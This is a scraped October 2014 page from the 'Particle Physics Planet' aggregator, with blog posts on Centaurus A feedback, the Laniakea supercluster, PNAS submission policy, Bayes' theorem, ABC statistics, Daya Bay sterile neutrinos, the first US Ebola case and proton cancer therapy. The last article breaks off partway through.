Particle Physics Planet

October 02, 2014

astrobites - astro-ph reader's digest

MUSEing on positive feedback

Title: MUSE discovers perpendicular arcs in Cen A inner filament
Authors: S. Hamer, P. Salomé, F. Combes and Q. Salomé
First Author Institution: LERMA, Observatoire de Paris, UMR 8112 61, Av. de l’Observatoire, F-75014, Paris, France
Status: Submitted to Astronomy & Astrophysics

Figure 1. Centaurus A (NGC5128) is the largest extragalactic radio source projected on the sky and is at a distance of 3.8Mpc. Located in the constellation of Centaurus in the southern sky it can be seen with the naked eye in perfect conditions. Credit: ESO.

Figure 1. Centaurus A (NGC5128) is the largest extragalactic radio source projected on the sky and is at a distance of 3.8Mpc. Located in the constellation of Centaurus in the southern sky it can be seen with the naked eye in perfect conditions. Credit: ESO.

Both observations and theory show that galaxies can’t form stars on their own indefinitely – they need some mechanism to moderate star formation in order to match the evolutionary path that we know galaxies follow. Turbulence within the gas used for star formation is needed in order to keep a galaxy ‘alive’. By mixing the gas available, denser areas can begin to form of cold hydrogen gas which can eventually collapse and form stars. As soon as this mixing stops, and the gas is allowed to settle, then further star formation will not take place.

Supernova explosions send shock waves and energy propagating through the inter stellar medium (ISM), which could produce enough turbulent mixing of the gas to self-regulate star formation.  But radio jets streaming from active black holes could be an even stronger source of turbulence which causes the same effect; known as positive feedback which occurs on a local scale (unlike the more documented negative feedback which acts to decrease star formation rates on a global scale across a galaxy). Although the mechanism responsible (supernovae, black holes or something else entirely)  for this turbulent mixing is uncertain, what is certain is that simulations which do not contain such a prescription produce galaxies which are on average too small to match observations.

The authors of this paper search for observational evidence for this interaction of radio jets with the ISM by observing NGC5128 (Centaurus A), which is a giant elliptical galaxy hosting a massive black hole (~20 million solar masses) and large radio lobes extending over 250 kiloparsecs (see Figure 1). Using the MUSE spectrograph on the VLT in Chile, they searched for the broadening of emission lines along optical structures which are in line with the radio jets of the galaxy. Such a broadening would indicate places where the gas has been shocked and therefore heated; providing energy for turbulent mixing. Therefore these areas are the predecessors of star forming birth clouds.

Figure 2 shows the results from observing the first Balmer line Hα emission from Centaurs A. The left panels show the flux of this line and right panels show how broad this line was in the given area. If an emission line is broadened, it means that the gas giving out this wavelength of light is moving chaotically and so a Doppler shift is imprinted on the narrow emission line to both lengthen and shorten the wavelength, giving a broader line feature on the spectrum.

One of the immediately noticeable features of these maps is the existence of the strange arc like structure (visible as the dark blue structure in the second panel of Figure 2) which is entirely separate to the main filamentary structures and also opposite in curvature to the optical stellar shell surrounding the central galaxy. The authors rule out the theory that these arcs are part of a separate filament feeding gas down onto the main structure as there would be a smoother velocity transition (calculated from the difference between the broadness of the two emission lines Hα – [NII]) between the arc and filament than seen in the third panel of Figure 2. They instead muse that these arcs are backflows of gas from the active black hole outburst formed when fast moving material ran into slow moving material at the front. Simulations show that this is completely plausible however such a structure would only be visible for ~1Myr, suggesting that the black hole activity in Centaurus A began relatively recently.

Figure 2: The first panels show the Hα flux maps of the main inner filament and the second with that area subtracted to show an arc like structure in the background. The third panel shows Hα – [NII]; by comparing the difference between the broadness  of two different emission lines ([NII] is an electron emission from Nitrogen) we can work out how fast the gas is moving. The fourth panel showing the broadening of the Hα emission line around the edges of the clumps of the main filament (right). All four maps show the same region of the galaxy. Credit: Hamer et al. (2014).

The second most striking results shown by the maps in Figure 2 is the thin region of highly broadened Hα emission around the edges of the  clumpy main filamentary structure, which can be seen in the fourth panel. The broadened width of these lines (~400 km/s) agrees with the predictions of simulations of shock waves, suggesting that this clumpy filamentary structure is surrounded by a shell of gas which has interacted with the radio jet. These clumps are also extremely bright in the UV (as observed by GALEX), suggesting that the gas in the filament is forming stars – possibly as a direct result of this interaction with the radio jet. The authors therefore claim that this is direct observational evidence for positive feedback from the active black hole in Centaurus A.

If their interpretation is correct, the black hole could spur star formation on Centaurus A for hundreds of millions of years to come.



by Becky Smethurst at October 02, 2014 12:43 PM

The Great Beyond - Nature blog

PNAS narrows pathway to publication

One door to publishing in the Proceedings of the National Academy of Sciences (PNAS) has slammed shut. In an editorial this week, Editor-in Chief Inder Verma said the prestigious US journal will no longer accept submitted papers that come with a pre-arranged editor (who is a member of the National Academy of Sciences).

The journal formalized this publication track in 2010, when it eliminated so-called “communicated” papers, which allowed academy members to usher papers from non-member colleagues through to publication. Papers with pre-arranged editors (known in PNAS-speak as “PE”) went through peer review, but the process was shepherded by an academy member pre-chosen by the author of the paper, rather than an editor selected by journal. The intention was to encourage papers that were interdisciplinary or ‘ahead of their time’, and deserving of special attention. According to Verma’s letter: “The PE process was intended to be used on rare occasions but, since we formalized the PE process, more than 11,000 papers have been submitted by authors with a PE designation. Although we are certain that some of these papers truly needed special attention, the vast majority likely did not, and therefore we are discontinuing the PE process as of October 1, 2014.” Papers already submitted through that track won’t be affected by the change.

Nature noted Verma’s desire to eliminate pre-arranged editor submissions in a recent feature on PNAS (“The Inside Track”): “One in five direct submissions published in 2013 used a prearranged editor, and the acceptance rate for these papers is higher than for other direct submissions. ‘More and more the playing field will be levelled,’ says Verma.” That story focused on PNAS’s “contributed” path to publication, which lets academy members publish up to four papers per year using peer reviewers they select (whose comments the members can take or leave). As our story noted, many members rarely or never use the “contributed”  track, while just a handful make regular use of it. This publication track remains unchanged, so academy members don’t need to make an “Indiana Jones” style dash through a closing door just yet.

hat tip: In the Pipeline

by Ewen Callaway at October 02, 2014 12:16 PM

The Great Beyond - Nature blog

UK and US universities slip in latest rankings

The California Institute of Technology was ranked #1 university in the world by the Times Higher Education, but overall the US lost three institutions from the top-200.

Bob Paz/Caltech

Universities in both the United States and United Kingdom slipped slightly down the tables in the latest Times Higher Education World University Rankings 2014-15, released on 1 October.

Both countries still dominate the rankings, with 103 of the top 200 institutions — and the totality of the top 12 spots — between them. The California Institute of Technology in Pasadena topped the table for the fourth year in a row (see Top 10 below). But overall the US lost three institutions from the top 200, and the UK lost two. According to THE, over four years the US has suffered the largest total loss in rankings position.

Meanwhile universities on the Asian continent continued to rise within the ranking, with China, Russia and Hong Kong gaining one top 200 representative each, and Turkey gaining three. German universities also increased their representation, with two new top-200 entrants.

The rankings, which were revamped in 2010, try to measure an institution’s research, teaching, knowledge transfer and international outlook, based on 13 criteria, which include a reputation survey, subject-averaged citation impact, income from industry and international co-authorship.

Flaws in such rankings are well documented (see ‘University rankings ranked’), but the annual tables continue to prove popular among students and policymakers. The THE results come on the back of the QS World University Rankings, which painted a rosier picture for UK universities.

2014-15 Rank
2013-14 Rank
Institution name
1 1 California Institute of Technology
2 2 Harvard University
3 2 University of Oxford
4 4 Stanford University
5 7 University of Cambridge
6 5 Massachusetts Institute of Technology
7 6 Princeton University
8 8 University of California, Berkeley
9 10 Imperial College London

by Elizabeth Gibney at October 02, 2014 11:40 AM

Christian P. Robert - xi'an's og

plenty of new arXivals!

Here are some entries I spotted in the past days as of potential interest, for which I will have not enough time to comment:

  • arXiv:1410.0163: Instrumental Variables: An Econometrician’s Perspective by Guido Imbens
  • arXiv:1410.0123: Deep Tempering by Guillaume Desjardins, Heng Luo, Aaron Courville, Yoshua Bengio
  • arXiv:1410.0255: Variance reduction for irreversible Langevin samplers and diffusion on graphs by Luc Rey-Bellet, Konstantinos Spiliopoulos
  • arXiv:1409.8502: Combining Particle MCMC with Rao-Blackwellized Monte Carlo Data Association for Parameter Estimation in Multiple Target Tracking by Juho Kokkala, Simo Särkkä
  • arXiv:1409.8185: Adaptive Low-Complexity Sequential Inference for Dirichlet Process Mixture Models by Theodoros Tsiligkaridis, Keith W. Forsythe
  • arXiv:1409.7986: Hypothesis testing for Markov chain Monte Carlo by Benjamin M. Gyori, Daniel Paulin
  • arXiv:1409.7672: Order-invariant prior specification in Bayesian factor analysis by Dennis Leung, Mathias Drton
  • arXiv:1409.7458: Beyond Maximum Likelihood: from Theory to Practice by Jiantao Jiao, Kartik Venkat, Yanjun Han, Tsachy Weissman
  • arXiv:1409.7419: Identifying the number of clusters in discrete mixture models by Cláudia Silvestre, Margarida G. M. S. Cardoso, Mário A. T. Figueiredo
  • arXiv:1409.7287: Identification of jump Markov linear models using particle filters by Andreas Svensson, Thomas B. Schön, Fredrik Lindsten
  • arXiv:1409.7074: Variational Pseudolikelihood for Regularized Ising Inference by Charles K. Fisher

Filed under: Statistics, University life Tagged: arXiv, Bayesian Analysis, Ising, Monte Carlo methods, simulation, Statistics

by xi'an at October 02, 2014 11:28 AM

Tommaso Dorigo - Scientificblogging

Publish, Blog, Tweet: Furthering One's Career In Science Today
Today and tomorrow I am attending a workshop in Padova titled as per the title above (but it is in Italian). If you know the language and are interested in the topic, there is available live streaming at the workshop's site, here:

My contribution will be titled "The researcher who blogs: social value, opportunities, challenges, anathemas". I am speaking tomorrow at 10AM (Rome time zone - it's 1AM in California!). I will post some extract of my slides in the blog later on...

The workshop should be interesting, as many reknowned science popularization operators are present, and the topics in the agenda are attractive. Give it a look if you like...

by Tommaso Dorigo at October 02, 2014 10:57 AM

Peter Coles - In the Dark

The Curse of Assessment-led Teaching

Yesterday I took part in a University Teaching and Learning Strategy meeting that discussed, among other things, how to improve the feedback on student assessments in order to help them learn better. It was an interesting meeting, involving academics, administrative staff and representatives of the Students Union, that generated quite a few useful ideas. Looking through my back catalogue I realise that around this time year I was at a similar event based in the School of Mathematical and Physical Sciences at the University of Sussex of which I am Head.

Positive though yesterday’s discussion was, it didn’t do anything to dissuade me from a long-held view that the entire education system holds back the students’ ability to learn by assessing them far too much. One part of the discussion was about trying to pin down essentially what is meant by “Research-led Teaching” which is what we’re supposed to be doing at universities. In my view too much teaching is not really led by research at all, but mainly driven by assessment. The combination of the introduction of modular programmes and the increase of continuously assessed coursework has led to a cycle of partial digestion and regurgitation that involves little in the way of real learning and certainly nothing like the way research is done.

I’m not going to argue for turning the clock back entirely, but for the record my undergraduate degree involved no continuous assessment at all (apart from a theory project I opted for in my final year. Having my entire degree result based on the results of six three-hour unseen examinations in the space of three days is not an arrangement I can defend, but note that despite the lack of continuous assessment I still spent less time in the examination hall than present-day students.

That’s not to say I didn’t have coursework. I did, but it was formative rather than summative; in other words it was for the student to learn about the subject, rather for the staff to learn about the student. I handed in my stuff every week, it was marked and annotated by a supervisor, then returned and discussed at a supervision.

People often tell me that if a piece of coursework “doesn’t count” then the students won’t do it. There is an element of truth in that, of course. But I had it drummed into me that the only way really to learn my subject (Physics) was by doing it. I did all the coursework I was given because I wanted to learn and I knew that was the only way to do it.

The very fact that coursework didn’t count for assessment made the feedback written on it all the more useful when it came back because if I’d done badly I could learn from my mistakes without losing marks. This also encouraged me to experiment a little, such as using a method different from that suggested in the question. That’s a dangerous strategy nowadays, as many seem to want to encourage students to behave like robots, but surely we should be encouraging students to exercise their creativity rather than simply follow the instructions? The other side of this is that more challenging assignments can be set, without worrying about what the average mark will be or what specific learning outcome they address.

I suppose what I’m saying is that the idea of Learning for Learning’s Sake, which is what in my view defines what a university should strive for, is getting lost in a wilderness of modules, metrics, percentages and degree classifications. We’re focussing too much on those few aspects of the educational experience that can be measured, ignoring the immeasurable benefit (and pleasure) that exists for all humans in exploring new ways to think about the world around us.

by telescoper at October 02, 2014 07:56 AM

astrobites - astro-ph reader's digest

The Boundaries of the Supercluster

This paper gives new precision to the term “galaxy supercluster“. With a clear definition in hand, the authors also trace the bounds of our home supercluster, naming it “Laniakea”, or “Immense Heaven” in Hawaiian.

From the study by de Lapparent et al. 1986. Observed velocity (from the redshift) vs. right ascension. The dots represent 1100 galaxies.

Figure 1: From the study by de Lapparent et al. 1986. Observed velocity (from the redshift) vs. right ascension. The dots represent about a thousand galaxies.

Previously, maps of the universe, on the scale of hundreds of megaparsecs, have been drawn from redshift surveys of large numbers of galaxies. Each galaxy is located in three-dimensional space by its projection on our sky and its redshift, which is sort-of a measure of its distance from us. One such project produced this amazing slice of the universe almost three decades ago (Fig. 1). Each dot represents a galaxy, and the whole map gave us a first sense that nearby structure is dominated by filaments and voids.

But Tully and colleagues were occupied by a slightly different problem than mapping galaxies. They wanted to map out the distribution of all matter in the nearby universe, including the dark matter. There’s a significant difference. For example, in the case of the famous Bullet cluster of galaxies, the dark matter and the visible matter don’t line up. And dark matter is much more prevalent than visible matter, maybe five times as prevalent (divide the cold dark matter density of the universe by the baryon density, catalogued here).

To map all the matter in the universe, Tully and colleagues used over 8000 galaxies as gravitational probes. If a galaxy was moving with respect to the normal cosmological flow, they ascribed the peculiar velocity to a gravitational attraction. Deep surveys show us that all distant galaxies are flowing away from us, the universe is expanding. But within that bulk expansion, swarms of galaxies are getting tugged by their host superclusters. A map of the peculiar velocities of nearby galaxies, therefore, will reveal which galaxies belong to our supercluster, and which are being tugged elsewhere.

Figure 2: From Tully et al. 2014. This shows a single plane sliced through the center of the nearby universe. The colors represent matter densities, as reconstructed from peculiar velocities (blue represents a void, green an overdensity). The white streamlines are traced through the field of peculiar velocities. And the orange line shows the boundary between diverging flows.

Figure 2: From Tully et al. 2014. This shows a single plane (perpendicular to the supergalactic z-axis) sliced through the center of the nearby universe. The blue dot is home. Each white dot is a galaxy. The colors represent reconstructed matter densities: blue is less matter, green is more. The white streamlines are traced through the field of peculiar velocities; they reveal the ‘drainage basin’ of our local supercluster. An orange line represents the boundary between diverging flows. Nearby superclusters are labeled.

To determine a peculiar radial velocity, the authors found a distance measurement using brightness, then subtracted the observed velocity (that is, the redshift) from the cosmological flow (that is, Hubble’s constant multiplied by the distance). All the distance measuring techniques they used compare an object’s brightness to an estimate of its actual light output. Some techniques focus on an object in the galaxy (for example a Cepheid variable or a Type Ia supernova) or a sub-populations of stars. Other techniques use the galaxy itself: its inherent ‘graininess’, its rotation rate, or a relationship between its size and range of stellar velocities. To construct their massive catalog of 8000 peculiar radial velocities they used all of these tools.

With a map of peculiar radial velocities for these 8000 galaxies extending out to hundreds of megaparsecs, the authors reconstruct the most likely three-dimensional velocity field, assuming no swirls in the flow (an assumption consistent with the standard cosmological model at this large of a scale). The underlying peculiar velocity field describes the tiny gravitationally-perturbed motions of galaxies after subtracting out cosmological expansion. Our local “basin of attraction” is the region containing all the galaxies that would contract to a single point, if we were to neglect the dominant expansion. The authors define this region as our home supercluster, Laniakea.

This is the first time the boundaries of the local supercluster have been defined. Here’s a video describing their method and showing the resulting map of the nearby universe. A slice of this three-dimensional map is shown above.

by Brett Deaton at October 02, 2014 12:25 AM

October 01, 2014

Christian P. Robert - xi'an's og

Approximate Bayesian Computation in state space models

While it took quite a while (!), with several visits by three of us to our respective antipodes, incl. my exciting trip to Melbourne and Monash University two years ago, our paper on ABC for state space models was arXived yesterday! Thanks to my coauthors, Gael Martin, Brendan McCabe, and  Worapree Maneesoonthorn,  I am very glad of this outcome and of the new perspective on ABC it produces.  For one thing, it concentrates on the selection of summary statistics from a more econometrics than usual point of view, defining asymptotic sufficiency in this context and demonstrated that both asymptotic sufficiency and Bayes consistency can be achieved when using maximum likelihood estimators of the parameters of an auxiliary model as summary statistics. In addition, the proximity to (asymptotic) sufficiency yielded by the MLE is replicated by the score vector. Using the score instead of the MLE as a summary statistics allows for huge gains in terms of speed. The method is then applied to a continuous time state space model, using as auxiliary model an augmented unscented Kalman filter. We also found in the various state space models tested therein that the ABC approach based on the marginal [likelihood] score was performing quite well, including wrt Fearnhead’s and Prangle’s (2012) approach… I like the idea of using such a generic object as the unscented Kalman filter for state space models, even when it is not a particularly accurate representation of the true model. Another appealing feature of the paper is in the connections made with indirect inference.

Filed under: Statistics, Travel, University life Tagged: ABC, indirect inference, Kalman filter, marginal likelihood, Melbourne, Monash University, score function, state space model

by xi'an at October 01, 2014 10:14 PM

Symmetrybreaking - Fermilab/SLAC

Daya Bay places new limit on sterile neutrinos

The Daya Bay experiment, famous for studying neutrino mixing, is branching into a new area of neutrino physics.

The experiment that produced the latest big discovery about ghostly particles called neutrinos is trying its hand at solving a second neutrino mystery.

The Daya Bay Reactor Neutrino Experiment reported in Physical Review Letters today that it has narrowed the region in which the most elusive kind of neutrino, the sterile neutrino, might exist.

Located in southern China, the experiment studies low-energy neutrinos and their antimatter counterparts streaming from the nearby Daya Bay and Ling Ao nuclear power plants.

The primary goal of building the Daya Bay experiment was to better understand how neutrinos oscillate, or change from one type to another. Daya Bay scientists accomplished this in March 2012 with the discovery of a parameter called theta-13.

In the process they collected the most data on antineutrinos from a nuclear reactor of any experiment in the world.

“We have multiple reactors as well as detectors,” says co-leader of the Daya Bay experiment Kam-Biu Luk of Lawrence Berkeley National Laboratory and the University of California, Berkeley. “As a result we are in a very good position to search for sterile neutrinos, particularly in a region that hasn’t been explored before.”

Neutrinos are known to oscillate between three types. The question Daya Bay set out to answer was whether there is a fourth type that mixes with the other three. Sterile neutrinos have yet to be discovered, possibly because they interact with matter less than any other type of neutrino—a characteristic that has made them candidate dark matter particles.

In today’s result, Daya Bay scientists ruled out the existence of these neutrinos at the lowest masses ever probed.

“We have no idea where the sterile neutrino is hiding, if it exists,” Luk says. “Therefore it is very important to have many types of experiments search in different regions.”

The Daya Bay experiment is managed at the Institute of High Energy Physics in China, and its US contingent is based at Lawrence Berkeley National Laboratory and Brookhaven National Laboratory.

Daya Bay scientists will likely release a second sterile neutrino study only after they have finished collecting data in 2017, Luk says.


Like what you see? Sign up for a free subscription to symmetry!

by Kathryn Jepsen at October 01, 2014 09:20 PM

arXiv blog

Relationship Mining on Twitter Shows How Being Dumped Hurts More than Dumping

The first data mining study of romantic relationships on Twitter reveals that social networks undergo the equivalent of earthquakes after break ups.

“The breakup of a romantic relationship is one of the most distressing experiences one can go through in life.” So begin Venkata Garimella at Aalto University in Finland and a couple of pals, with more than a hint of misty-eyed regret. These guys have more insight than most thanks to their work studying the break-up of romantic relationships through the medium of Twitter.

October 01, 2014 08:15 PM

astrobites - astro-ph reader's digest

Two Weeks Left to Apply to Write for Astrobites

Astrobites logoThis is a reminder that there are still two weeks left to apply to write for Astrobites!

We are seeking new graduate students to join the Astrobites collaboration. Applicants must be current graduate students. The deadline for applications is 15 October. Please email if you have any questions.

The application consists of a sample Astrobite and two short essays. The application and instructions can be found and submitted at

by Astrobites at October 01, 2014 07:02 PM

Emily Lakdawalla - The Planetary Society Blog

Happy Fiscal Year 2015! Though NASA Still Doesn't Have a Budget
Congress passed a stopgap spending bill before taking off to campaign for re-election, keeping NASA's 2015 budget in limbo for another two months.

October 01, 2014 04:25 PM

Emily Lakdawalla - The Planetary Society Blog

Mars Orbiter Mission activates all science instruments as NASA, ISRO form joint Mars working group
Mars Orbiter Mission (MOM) began its science activities fully on Wednesday with all five science instruments being activated. And on Tuesday, an ISRO-NASA Mars working group was formed which will "seek to identify and implement scientific and technological goals that NASA and ISRO have in common regarding Mars exploration."

October 01, 2014 04:19 PM

The Great Beyond - Nature blog

Schön loses last appeal against PhD revocation

Jan Hendrik Schön

Materials Research Society

The German Federal Constitutional Court in Karlsruhe has confirmed on 1 October that the University of Constance was within its rights to revoke the PhD thesis of physicist Jan Hendrik Schön, who was dismissed in 2002 from Bell laboratories in Murray Hill, New Jersey, for falsifying research results.

Schön was still in his early 30s when he was dismissed after being found guilty of 16 counts of scientific misconduct.

He had worked in nanotechnology and had been considered a star scientist, able to create transistors out of single molecules. He published numerous papers in rapid succession in high-profile journals, including Nature and Science.

Two years later, following local investigations in Germany, the University of Constance decided in to revoke the PhD it had awarded to Schön in 1998. The university said that although it had no evidence that Schön engaged in wrongdoing during his PhD work, he no longer merited the degree because he had brought science into disrepute.

Schön has appealed that decision through different courts, and in 2010 a court in Freiburg ruled that he should get to keep his graduate degree. But the Federal Constitutional Court has the last word, and the university’s decision stands.


by alison abbott at October 01, 2014 02:44 PM

Peter Coles - In the Dark

Bayes, Laplace and Bayes’ Theorem

A  couple of interesting pieces have appeared which discuss Bayesian reasoning in the popular media. One is by Jon Butterworth in his Grauniad science blog and the other is a feature article in the New York Times. I’m in early today because I have an all-day Teaching and Learning Strategy Meeting so before I disappear for that I thought I’d post a quick bit of background.

One way to state Bayes’ Theorem is


where I refer to three logical propositions A, B and C and the vertical bar “|” denotes conditioning, i.e. P(A|B) means the probability of A being true given the assumed truth of B; “AB” means “A and B”, etc. Many versions of this, including the one in Jon Butterworth’s blog, exclude the third proposition and refer to A and B only. I prefer to keep an extra one in there to remind us that every statement about probability depends on information either known or assumed to be known; any proper statement of probability requires this information to be stated clearly and used appropriately but sadly this requirement is frequently ignored.

Although this is called Bayes’ theorem, the general form of it as stated here was actually first written down not by Bayes, but by Laplace. What Bayes did was derive the special case of this formula for “inverting” the binomial distribution. This distribution gives the probability of x successes in n independent “trials” each having the same probability of success, p; each “trial” has only two possible outcomes (“success” or “failure”). Trials like this are usually called Bernoulli trials, after Daniel Bernoulli. If we ask the question “what is the probability of exactly x successes from the possible n?”, the answer is given by the binomial distribution:

P_n(x|n,p)= C(n,x) p^x (1-p)^{n-x}


C(n,x)= \frac{n!}{x!(n-x)!}

is the number of distinct combinations of x objects that can be drawn from a pool of n.

You can probably see immediately how this arises. The probability of x consecutive successes is p multiplied by itself x times, or px. The probability of (n-x) successive failures is similarly (1-p)n-x. The last two terms basically therefore tell us the probability that we have exactly x successes (since there must be n-x failures). The combinatorial factor in front takes account of the fact that the ordering of successes and failures doesn’t matter.

The binomial distribution applies, for example, to repeated tosses of a coin, in which case p is taken to be 0.5 for a fair coin. A biased coin might have a different value of p, but as long as the tosses are independent the formula still applies. The binomial distribution also applies to problems involving drawing balls from urns: it works exactly if the balls are replaced in the urn after each draw, but it also applies approximately without replacement, as long as the number of draws is much smaller than the number of balls in the urn. I leave it as an exercise to calculate the expectation value of the binomial distribution, but the result is not surprising: E(X)=np. If you toss a fair coin ten times the expectation value for the number of heads is 10 times 0.5, which is five. No surprise there. After another bit of maths, the variance of the distribution can also be found. It is np(1-p).

So this gives us the probability of x given a fixed value of p. Bayes was interested in the inverse of this result, the probability of p given x. In other words, Bayes was interested in the answer to the question “If I perform n independent trials and get x successes, what is the probability distribution of p?”. This is a classic example of inverse reasoning, in that it involved turning something like P(A|BC) into something like P(B|AC), which is what is achieved by the theorem stated at the start of this post.

Bayes got the correct answer for his problem, eventually, but by very convoluted reasoning. In my opinion it is quite difficult to justify the name Bayes’ theorem based on what he actually did, although Laplace did specifically acknowledge this contribution when he derived the general result later, which is no doubt why the theorem is always named in Bayes’ honour.


This is not the only example in science where the wrong person’s name is attached to a result or discovery. Stigler’s Law of Eponymy strikes again!

So who was the mysterious mathematician behind this result? Thomas Bayes was born in 1702, son of Joshua Bayes, who was a Fellow of the Royal Society (FRS) and one of the very first nonconformist ministers to be ordained in England. Thomas was himself ordained and for a while worked with his father in the Presbyterian Meeting House in Leather Lane, near Holborn in London. In 1720 he was a minister in Tunbridge Wells, in Kent. He retired from the church in 1752 and died in 1761. Thomas Bayes didn’t publish a single paper on mathematics in his own name during his lifetime but was elected a Fellow of the Royal Society (FRS) in 1742.

The paper containing the theorem that now bears his name was published posthumously in the Philosophical Transactions of the Royal Society of London in 1763. In his great Philosophical Essay on Probabilities Laplace wrote:

Bayes, in the Transactions Philosophiques of the Year 1763, sought directly the probability that the possibilities indicated by past experiences are comprised within given limits; and he has arrived at this in a refined and very ingenious manner, although a little perplexing.

The reasoning in the 1763 paper is indeed perplexing, and I remain convinced that the general form we now we refer to as Bayes’ Theorem should really be called Laplace’s Theorem. Nevertheless, Bayes did establish an extremely important principle that is reflected in the title of the New York Times piece I referred to at the start of this piece. In a nutshell this is that probabilities of future events can be updated on the basis of past measurements or, as I prefer to put it, “one person’s posterior is another’s prior”.




by telescoper at October 01, 2014 07:35 AM

September 30, 2014

The Great Beyond - Nature blog

First US Ebola case diagnosed

A man has been diagnosed with Ebola virus disease in Dallas, Texas.

The man diagnosed with the illness on 30 September is the first in the United States, and the first person ever diagnosed outside Africa with the Zaire species of Ebola virus, which has killed more than 3,000 people in Africa in the current outbreak. A handful of Ebola patients have been treated in the United States during the current outbreak after being diagnosed with the disease in Africa.

The patient travelled from Liberia to the United States on a flight that landed on 20 September, began experiencing symptoms on 24 September, sought care on 26 September and was admitted to an isolation ward at Texas Health Presbyterian Hospital Dallas on 28 September. The US Centers for Disease Control and Prevention (CDC) in Atlanta and a state health department lab in Austin, Texas, both diagnosed Ebola in samples from the patient.

CDC director Thomas Frieden said that the patient was in the United States visiting family and did not appear to be involved in the Ebola outbreak response in Africa.

Frieden said that public-health officials began tracing the contacts of the individual today, and do not think that passengers who were on his flight are at risk of infection with Ebola. Frieden said that officials have identified “several family members and one or two community members” who had contact with the patient after he became sick and so therefore may have been exposed to the virus. Officials will monitor them for 21 days, the period of time in which they will show symptoms if they have been infected with Ebola.

“Ebola doesn’t spread until someone gets sick, and he didn’t get sick until four days after he got off the airplane, so we do not believe there was any risk to anyone who was on the flight,” Frieden said.

“I have no doubt that we will control this importation, or case of Ebola, so that it does not spread widely in this country,” Frieden said. “It does reflect the ongoing spread of Ebola in Liberia and West Africa where there are a large number of cases.”

Frieden said further that doctors were considering providing experimental treatments to the patient such as injections of blood or serum from other Ebola survivors.

“That’s being discussed with the hospital and family now and if appropriate, they would be provided to the extent available,” Frieden said.

Few other details about the patient were provided, though officials did say that he is “ill and in intensive care”.


by Erika Check Hayden at September 30, 2014 10:49 PM

Christian P. Robert - xi'an's og

ABC model choice via random forests [expanded]

outofAfToday, we arXived a second version of our paper on ABC model choice with random forests. Or maybe [A]BC model choice with random forests. Since the random forest is built on a simulation from the prior predictive and no further approximation is used in the process. Except for the computation of the posterior [predictive] error rate. The update wrt the earlier version is that we ran massive simulations throughout the summer, on existing and new datasets. In particular, we have included a Human dataset extracted from the 1000 Genomes Project. Made of 51,250 SNP loci. While this dataset is not used to test new evolution scenarios, we compared six out-of-Africa scenarios, with a possible admixture for Americans of African ancestry. The scenario selected by a random forest procedure posits a single out-of-Africa colonization event with a secondary split into a European and an East Asian population lineages, and a recent genetic admixture between African and European lineages, for Americans of African origin. The procedure reported a high level of confidence since the estimated posterior error rate is equal to zero. The SNP loci were carefully selected using the following criteria: (i) all individuals have a genotype characterized by a quality score (GQ)>10, (ii) polymorphism is present in at least one of the individuals in order to fit the SNP simulation algorithm of Hudson (2002) used in DIYABC V2 (Cornuet et al., 2014), (iii) the minimum distance between two consecutive SNPs is 1 kb in order to minimize linkage disequilibrium between SNP, and (iv) SNP loci showing significant deviation from Hardy-Weinberg equilibrium at a 1% threshold in at least one of the four populations have been removed.

In terms of random forests, we optimised the size of the bootstrap subsamples for all of our datasets. While this optimisation requires extra computing time, it is negligible when compared with the enormous time taken by a logistic regression, which is [yet] the standard ABC model choice approach. Now the data has been gathered, it is only a matter of days before we can send the paper to a journal

Filed under: Statistics, University life Tagged: 1000 Genomes Project, ABC, ABC model choice, admixture, bootstrap, DIYABC, Human evolution, logistic regression, out-of -Africa scenario, posterior predictive, prior predictive, random forests

by xi'an at September 30, 2014 10:14 PM

Symmetrybreaking - Fermilab/SLAC

Accelerating the fight against cancer

As charged-particle therapies grow in popularity, physicists are working with other experts to make them smaller, cheaper and more effective—and more available to cancer patients in the United States.

Once physicists started accelerating particles to high energies in the 1930s, it didn’t take them long to think of a killer app for this new technology: zapping tumors.

Standard radiation treatments, which had already been around for decades, send X-rays straight through the tumor and out the other side of the body, damaging healthy tissue both coming and going. But protons and ions—atoms stripped of electrons—slow when they hit the body and come to a stop, depositing most of their destructive energy at their stopping point. If you tune a beam of protons or ions so they stop inside a tumor, you can deliver the maximum dose of radiation while sparing healthy tissue and minimizing side effects. This makes it ideal for treating children, whose developing bodies are particularly sensitive to radiation damage, and for cancers very close to vital tissues such as the optic nerves or spinal cord.

Today, nearly 70 years after American particle physicist Robert Wilson came up with the idea, proton therapy has been gaining traction worldwide and in the United States, where 14 centers are treating patients and nine more are under construction. Ions such as carbon, helium and oxygen are being used to treat patients in Germany, Italy, China and Japan. More than 120,000 patients had been treated with various forms of charged-particle therapy by the end of 2013, according to the Particle Therapy Co-Operative Group.

New initiatives from CERN research center in Europe and the Department of Energy and National Cancer Institute in the United States are aimed at moving the technology along, assessing its strengths and limitations and making it more affordable.

And physicists are still deeply involved. No one knows more about building and operating particle accelerators and detectors. But there’s a lot more to know. So they’ve been joining forces with physicians, engineers, biologists, computer scientists and other experts to make the equipment smaller, lighter, cheaper and more efficient and to improve the way treatments are done.

“As you get closer to the patient, you leave the world accelerator physicists live in and get closer to the land of people who have PhDs in medical physics,” says Stephen Peggs, an accelerator physicist at Brookhaven National Laboratory.

“It’s alignment, robots and patient ergonomics, which require just the right skill sets, which is why it’s fun, of course, and one reason why it’s interesting—designing with patients in mind.”

Knowing where to stop

The collaborations that make charged-particle therapy work go back a long way. The first experimental treatments took place in 1954 at what is now Lawrence Berkeley National Laboratory. Later scientists at Fermi National Accelerator Laboratory designed and built the circular accelerator at the heart of the first hospital-based proton therapy center in the United States, opened in 1990 at California’s Loma Linda University Medical Center.

A number of private companies have jumped into the field, opening treatment centers, selling equipment and developing more compact and efficient treatment systems that are designed to cut costs. ProTom International, for instance, recently received US Food and Drug Administration approval for a system that’s small enough and light enough to ship on a plane and move in through a door, so it will no longer be necessary to build the treatment center around it. Other players include ProCure, Mevion, IBA, Varian Medical Systems, ProNova, Hitachi, Sumitomo and Mitsubishi.

The goal of any treatment scheme is to get the beam to stop in exactly the right spot; the most advanced systems scan a beam back and forth to “paint” the 3-D volume of the tumor with great precision. Aiming it is not easy, though. Not only is every patient’s body different—a unique conglomeration of organs and tissues of varying densities—but every patient breathes, so the target is in constant motion.

Doctors use X-ray CT scans—the CT stands for “computed tomography”—to make a 3-D image of the tumor and its surroundings so they can calculate the ideal stopping point for the proton beam. But since protons don’t travel through the body exactly the same way X-rays do—their paths are shifted by tiny, rapid changes in the tissues they encounter along the way—their end points can differ slightly from the predicted ones.

Physicists are trying to reduce that margin of error with a technology called proton CT.

